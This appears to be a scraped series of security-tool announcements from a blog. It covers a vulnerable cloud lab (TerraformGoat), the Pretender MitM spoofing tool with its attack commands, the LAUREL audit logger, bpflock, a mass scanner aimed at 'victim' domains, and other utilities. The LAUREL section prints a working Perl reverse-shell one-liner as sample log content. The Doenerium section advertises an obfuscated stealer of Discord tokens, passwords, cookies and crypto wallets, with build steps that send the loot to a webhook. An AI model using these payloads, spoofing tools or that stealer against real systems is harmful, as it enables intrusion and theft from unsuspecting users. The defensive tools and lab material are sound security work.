docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker run -itd --name terraformgoat_huaweicloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker exec -it terraformgoat_huaweicloud_0.0.4 /bin/bash

Amazon Web Services

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker run -itd --name terraformgoat_aws_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker exec -it terraformgoat_aws_0.0.4 /bin/bash

Google Cloud Platform

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker run -itd --name terraformgoat_gcp_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker exec -it terraformgoat_gcp_0.0.4 /bin/bash

Microsoft Azure

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker run -itd --name terraformgoat_azure_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker exec -it terraformgoat_azure_0.0.4 /bin/bash


Demo

After entering the container, cd to the corresponding scenario directory and you can start deploying the scenario.

Here is a demonstration of the Alibaba Cloud Bucket Object Traversal scenario build.

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash


Β 

cd /TerraformGoat/aliyun/oss/bucket_object_traversal/
aliyun configure
terraform init
terraform apply



The program prompts Enter a value:, type yes and enter, use curl to access the bucket, you can see the object traversed.



To avoid the cloud service from continuing to incur charges, remember to destroy the scenario in time after using it.

terraform destroy

οš€
Uninstall

If you are in a container, first execute the exit command to exit the container, and then execute the following command under the host.

docker stop $(docker ps -a -q -f "name=terraformgoat*")
docker rm $(docker ps -a -q -f "name=terraformgoat*")
docker rmi $(docker images -a -q -f "reference=registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat*")

Notice

  1. The README of each vulnerable environment is executed within the TerraformGoat container environment, so the TerraformGoat container environment needs to be deployed first.
  2. Due to the horizontal risk of intranet horizontal on the cloud in some scenarios, it is strongly recommended that users use their own test accounts to configure the scenarios, avoid using the cloud account of the production environment, and install TerraformGoat using Dockerfile to isolate the user's local cloud vendor token and the test account token.
  3. TerraformGoat is used for educational purposes only, It is not allowed to use it for illegal and criminal purposes, any consequences arising from TerraformGoat are the responsibility of the person using it, and not the selefra organization.


Contributing

Contributions are welcomed and greatly appreciated. Further reading β€” CONTRIBUTING.md for details on contribution workflow.

License

TerraformGoat is under the Apache 2.0 license. See the LICENSE file for details.



Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing

27 July 2022 at 12:30
By: Zion3R

Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing


pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket's ntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disabled DHCPv6, DNS and router advertisements), --no-lnr (disabled mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be setup to only respond to queries for certain domains (or all but certain domains) and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor (the MAC prefix length can be arbitrary).
  • If you only want to perform Kerberos relaying you can specify --no-lnr and --spoof-types SOA to ignore any queries that are unrelated to the attack.
  • When conducting a Kerberos relay attack where krbrelayx.py runs on a different host than pretender (relay IPv4 address points to different host that runs krbrelayx.py), the host running krbrelayx.py will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.

Building and Vendoring

Pretender can be build as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces


Laurel - Transform Linux Audit Logs For SIEM Usage

26 July 2022 at 12:30
By: Zion3R


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event record are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as keys to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that set keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_gmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <[email protected]>.



Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines

25 July 2022 at 12:30
By: Zion3R


bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in experimental stage, it may break, options and security semantics may change, some BPF programs will be updated to use Cilium ebpf library.


1. Introduction

bpflock uses eBPF to strength Linux security. By restricting access to a various range of Linux features, bpflock is able to reduce the attack surface and block some well known attack techniques.

Only programs like container managers, systemd and other containers/programs that run in the host pid and network namespaces are allowed access to full Linux features, containers and applications that run on their own namespace will be restricted. If bpflock bpf programs run under the restricted profile then all programs/containers including privileged ones will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intent to replace AppArmor, SELinux, and other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features, however it does not protect against evil root.

2. Functionality Overview

2.1 Security features

bpflock offer multiple security protections that can be classified as:

2.2 Semantics

bpflock keeps the security semantics simple. It support three global profiles to broadly cover the security sepctrum, and restrict access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program, it takes one of the followings:

    • allow|none|privileged : they are the same, they define the least secure profile. In this profile access is logged and allowed for all processes. Useful to log security events.
    • baseline : restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under baseline profile, this is useful for applications that are too specific and perform privileged operations. It will reduce the use of the allow | privileged profile, so instead of using the privileged profile, we can specify the baseline one and add a set of allowed commands to offer a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under allow|privileged and baseline profiles, it allows to restrict access to some features without using the full restricted profile that might break some specific applications. Using baseline or privileged profiles opens the gate to access most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples check bpflock configuration examples

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

    If your kernel was compiled with CONFIG_BPF_LSM=y check the /boot/config-* to confirm, but when running bpflock it fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"

    Then to enable BPF LSM as an example on Ubuntu:

    1. Open the /etc/default/grub file as privileged of course.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.

    3.2 Docker deployment

    To run using the default allow or privileged profile (the least secure profile):

    docker run --name bpflock -it --rm --cgroupns=host \
    --pid=host --privileged \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Fileless Binary Execution

    To log and restict fileless binary execution run with:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    When running under restricted profile, the container logs will display:

    Running under the restricted profile may break things, this is why the default profile is allow.

    Kernel Modules Protection

    To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -p -n -f
    # modprobe xfs
    modprobe: ERROR: could not insert 'xfs': Operation not permitted
    Kernel Image Lock-down

    To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
    $ sudo unshare -f -p -n bash
    # head -c 1 /dev/mem
    head: cannot open '/dev/mem' for reading: Operation not permitted
    BPF Protection

    To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example running in a different pid and network namespaces and using bpftool:

    $ sudo unshare -f -p -n bash
    # bpftool prog
    Error: can't get next program: Operation not permitted
    Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all:
    3.3 Configuration and Environment file

    Passing configuration as bind mounts can be achieved using the following command.

    Assuming bpflock.yaml and bpf.d profiles configs are in current directory inside bpflock directory, then we can just use:

    ls bpflock/
    bpf.d bpflock.d bpflock.yaml
    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -v $(pwd)/bpflock/:/etc/bpflock \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

    Example run with environment variables in a file:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    --env-file bpflock.env.list \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    4. Documentation

    Documentation files can be found here.

    5. Build

    bpflock uses docker BuildKit to build and Golang to make some checks and run tests. bpflock is built inside Ubuntu container that downloads the standard golang package.

    Run the following to build the bpflock docker container:

    git submodule update --init --recursive
    make

    Bpf programs are built using libbpf. The docker image used is Ubuntu.

    If you want to only build the bpf programs directly without using docker, then on Ubuntu:

    sudo apt install -y pkg-config bison binutils-dev build-essential \
    flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
    zlib1g-dev libelf-dev libfl-dev gcc-multilib zlib1g-dev \
    libcap-dev libiberty-dev libbfd-dev

    Then run:

    make bpf-programs

    In this case the generated programs will be inside the ./bpf/build/... directory.

    Credits

    bpflock uses lot of resources including source code from the Cilium and bcc projects.

    License

    The bpflock user space components are licensed under the Apache License, Version 2.0. The BPF code where it is noted is licensed under the General Public License, Version 2.0.



Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

24 July 2022 at 12:30
By: Zion3R

Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

  • Discord Token
  • Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Discord Friends with rare badges
  • Grabs crypto wallets
    • Zcash
    • Armory
    • Bytecoin
    • Jaxx
    • Exodus
    • Ethereum
    • Electrum
    • AtomicWallet
    • Guarda
    • Coinomi
  • Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
  • Screenshot(s)
  • Injects itself to discord to grab token when changed

Β 

Additional

  • Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
  • Ultra Obfuscation (use https://obfuscator.io)
  • Anti-Debug
  • Anti-VM
  • Validates a found discord token and then sends it to your discord webhook
  • Sends all files to your discord webhook in beautiful embeds and a structured zip filE

Β 

Screenshots









Β  Setting Up

Install Node.js

Install Visual studio with C++ compilers and all enabled (is a bit gigs but u wont have errors)

Run install.bat file to install all necessary files

Replace WEBHOOK with your webhook in config.js

Run build.bat and wait for doenerium-win.exe to be built.

Todo

  • Exodus wallet injection (get the password whenever the user logs in the wallet)
  • More grabbers (VPN's, Gaming, Messengers)
  • Keylogger
  • Growtopia stealer
  • Discord bot to build within discord ($build <webhook_url>)
  • Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info seeΒ commonsclause

Note

There is no official telegram server of this project. I don't own t.me/doenerium

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity

23 July 2022 at 12:30
By: Zion3R


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. (1)

To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," Since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with python3; python2 compatability will be completed shortly (hence the lack of f strings). Standard libraries should be fine.



LiveTargetsFinder - Generates Lists Of Live Hosts And URLs For Targeting, Automating The Usage Of MassDNS, Masscan And Nmap To Filter Out Unreachable Hosts And Gather Service Information

22 July 2022 at 12:30
By: Zion3R


Generates lists of live hosts and URLs for targeting, automating the usage of Massdns, Masscan and nmap to filter out unreachable hosts

Given an input file of domain names, this script will automate the usage of MassDNS to filter out unresolvable hosts, and then pass the results on to Masscan to confirm that the hosts are reachable and on which ports. The script will then generate a list of full URLs to be used for further targeting (passing into tools like gobuster or dirsearch, or making HTTP requests), a list of reachable domain names, and a list of reachable IP addresses. As an optional last step, you can run an nmap version scan on this reduced host list, verifying that the earlier reachable hosts are up, and gathering service information from their open ports.


Overview

This script is especially useful for large domain sets, such as subdomain enumerations gathered from an apex domain with thousands of subdomains. With these large lists, an nmap scan would simply take too long. The goal here is to first use the less accurate, but much faster, MassDNS to quickly reduce the size of your input list by removing unresolvable domains. Then, Masscan will be able to take the output from MassDNS, and further confirm that the hosts are reachable, and on which ports. The script will then parse these results and generate lists of the live hosts discovered.

Now, the list of hosts should be reduced enough to be suitable for further scanning/testing. If you want to go a step further, you can tell the script to run an nmap scan on the list of reachable hosts, which should take more reasonable amount of time with the shorter list of hosts. After running nmap, any false positives given from Masscan will be filtered out. Raw nmap output will be stored in the regular nmap XML format, and additional information from the version detection will be added to a SQLite database.

Installation

If using the nmap scan option, this tool assumes that you already have nmap installed

Note: Running the install script is only needed if you do not already have MassDNS and Masscan installed, or if you would like to reinstall them inside this repo. If you do not run the script, you can provide the paths to the respective executables as arguments. The script additionally expects that the resolvers list included with MassDNS be located at {massDNS_directory}/lists/resolvers.txt.

git clone https://github.com/allyomalley/LiveTargetsFinder.git
cd LiveTargetsFinder
sudo pip3 install -r requirements.txt

(OPTIONAL)

chmod +x install_deps.sh
./install_deps.sh

If you do not already have MassDNS and Masscan installed, and would prefer to install them yourself, see the documentation for instructions:

MassDNS

Masscan

I have only tested this script on macOS and Linux - the python script itself should work on a Windows machine, though I believe the installation for MassDNS and Masscan will differ.

Usage

python3 liveTargetsFinder.py [domainList] [options]
Flag Description Default Required
Β  Β  Β  Β  Β  Β  Β  Β  --target-list Β  Β  Β  Β  Β  Β  Β  Β  Input file containing list of domains, e.g google.com Yes
Β  --massdns-path Β  Path to the MassDNS executable, if non-default ./massdns/bin/massdns No
Β  --masscan-path Β  Path to the Masscan executable, if non-default ./masscan/bin/masscan No
Β  --nmap Β  Run an nmap version detection scan on the gathered live hosts Disabled No
Β  --db-path Β  If using the --nmap option, supply the path to the database you would like to append to (will be created if does not exist) output/liveTargetsFinder.sqlite3 No
  • Note that the Masscan and MassDNS settings are hardcoded inside liveTargetsFinder.py. Feel free to edit them (lines 87 + 97).
  • Since this tool was designed with very large lists in mind, I tweaked many of the settings to try to balance speed, accuracy, and network constraints - these can all be adjusted to suit your needs and bandwith.
  • Default settings for Masscan only scans ports 80 and 443.
    • -s, (--hashmap-size) in particular was chosen for performance reasons - you will likely be able to increase this.
    • Full MassDNS arguments:
      • -c 25 -o J -r ./massdns/lists/resolvers.txt -s 100 -w massdnsOutput -t A targetHosts
      • Documentation
  • Another setting of note is the --max-rate argument for Masscan - you will likely want to adjust this.
    • Full Masscan arguments:
      • -iL ipFile -oD masscanOutput --open-only --max-rate 5000 -p80,443 --max-retries 10
      • Documentation
  • Default nmap settings only scans ports 80 and 443, with timing -T4 and a few NSE scripts.
    • Full nmap arguments:
      • --script http-server-header.nse,http-devframework.nse,http-headers -sV -T4 -p80,443 -oX {output.xml}

Example

Did run install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt

Did NOT run the install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt --massdns-path ../massdns/bin/massdns --masscan-path ../masscan/bin/masscan 

Perform an nmap scan and write to/append to the default DB path (liveTargetsFinder.sqlite3)

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap

Perform an nmap scan and write to/append to the specified database

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap --db-path serviceinfo_victim.sqlite3

Output

Input: victimDomains.txt

File Description Examples
output/victimDomains_targetUrls.txt List of reachable, live URLs https://github.com, http://github.com
output/victimDomains_domains_alive.txt List of live domain names github.com, google.com
output/victimDomains_ips_alive.txt List of live IP addresses 10.1.0.200, 52.3.1.166
Supplied or default DB Path SQLite database storing live hosts and information about their services running
output/victimDomains_massdns.txt The raw output from MassDNS, in ndjson format
output/victimDomains_masscan.txt The raw output from Masscan, in ndjson format
output/victimDomains_nmap.txt The raw output from nmap, in XML format


RESim - Reverse Engineering Software Using A Full System Simulator

21 July 2022 at 12:30
By: Zion3R


Reverse engineering using a full system simulator.

  • Dynamic analysis by instrumenting simulated hardware using Simics
  • Trace process trees, system calls and individual programs
  • Reverse execution to selected breakpoints and events
  • Integrated with IDA Pro(tm) debugging client
  • Fuzz with a customized AFL, injecting directly into simulated memory
RESim is a dynamic system analysis tool that provides detailed insight into processes, programs and data flow within networked computers. RESim simulates networks of computers through use of the Simics'[1] platform’s high fidelity models of processors, peripheral devices (e.g., network interface cards), and disks. The networked simulated computers load and run targeted software copied from images extracted from the physical systems being modeled.

Broadly, RESim aids reverse engineering and vulnerability analysis of networks of Linux-based systems by inventorying processes in terms of the programs they execute and the data they consume. Data sources include files, device interfaces and inter-process communication mechanisms. Process execution and data consumption is documented through dynamic analysis of a running simulated system without installation or injection of software into the simulated system, and without detailed knowledge of the kernel hosting the processes.

RESim also provides interactive visibility into individual executing programs through use of a custom plug-in to the IDA Pro disassembler/debugger. The disassembler/debugger allows setting breakpoints to pause the simulation at selected events in either future time, or past time. For example, RESim can direct the simulation state to reverse until the most recent modification of a selected memory address.
Reloadable checkpoints may be generated at any point during system execution.
A RESim simulation can be paused for inspection, e.g., when a specified process is scheduled for execution, and subsequently continued, potentially with altered memory or register state. The analyst can explicitly modify memory or register content, and can also dynamically augment memory based on system events, e.g., change a password file entry when read by the su program.

Analysis is performed entirely through observation of the simulated target system’s memory and processor state, without need for shells, software injection, or kernel symbol tables. The analysis is said to be external because the analysis observation functions have no effect on the state of the simulated system.

RESim has been integrated with the American Fuzzing Lop (AFL) fuzzer. This fuzzing system injects fuzzed data directly into the application read buffer, simplifying the fuzzing setup and workflow. RESim automatically replays and analyzes any detected crashes, identifying the causes of crashes, e.g., corruption of execution control.

Please refer to the RESim User's Guide for additional information. A brief demonstration of RESim can be seen here: (https://nps.box.com/s/rf3n104ualg38pon6b7fm6m6wqk9zz50)

RESim is based on a software vetting and forensic analysis platform created for the DARPA Cyber Grand Challenge. That repo is here: https://github.com/mfthomps/cgc-monitor. A paper describing that work is at https://www.sciencedirect.com/science/article/pii/S1742287618301920 And a fine summary of the use of Simics in the CGC Monitor is at https://software.intel.com/content/www/us/en/develop/blogs/simics-software-automates-cyber-grand-challenge-validation.html

[1]Simics is a full system simulator sold by Wind River, which holds all relevant trademarks.



Cdb - Automate Common Chrome Debug Protocol Tasks To Help Debug Web Applications From The Command-Line And Actively Monitor And Intercept HTTP Requests And Responses

20 July 2022 at 12:30
By: Zion3R


Pown CDB is a Chrome Debug Protocol utility. The main goal of the tool is to automate common tasks to help debug web applications from the command-line and actively monitor and intercept HTTP requests and responses. This is particularly useful during penetration tests and other types of security assessments and investigations.


Credits

This tool is part of secapps.com open-source initiative.

  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com

Authors

Quickstart

This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.

Install Pown first as usual:

$ npm install -g [email protected]

Invoke directly from Pown:

$ pown cdb

Library Use

Install this module locally from the root of your project:

$ npm install @pown/cdb --save

Once done, invoke pown cli:

$ POWN_ROOT=. ./node_modules/.bin/pown-cli cdb

You can also use the global pown to invoke the tool locally:

$ POWN_ROOT=. pown cdb

Usage

WARNING: This pown command is currently under development and as a result will be subject to breaking changes.

pown cdb <command>

Chrome Debug Protocol Tool

Commands:
pown cdb launch Launch server application such as chrome, firefox, opera and edge [aliases: start]
pown cdb navigate <url> Go to the specified url [aliases: goto, go]
pown cdb network Chrome Debug Protocol Network Monitor [aliases: net, sniff, proxy, mon, monitor]
pown cdb cookies Dump current page cookies [aliases: cookie]
pown cdb screenshot <file> Screenshot the current page [aliases: capture, shoot, shot]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown cdb launch

pown cdb launch

Launch server application such as chrome, firefox, opera and edge

Options:
--version Show version number [boolean]
--help Show help [boolean]
--port, -p Remote debugging port [number] [default: 9222]
--xss-auditor, -x Turn on/off XSS auditor [boolean] [default: true]
--certificate-errors, -c Turn on/off certificate errors [boolean] [default: true]
--pentest, -t Start with prefered settings for pentesting [boolean] [default: false]

pown cdb navigate

pown cdb network
pown cdb cookies
pown cdb screenshot
Tutorials

Web Application Security Assessment

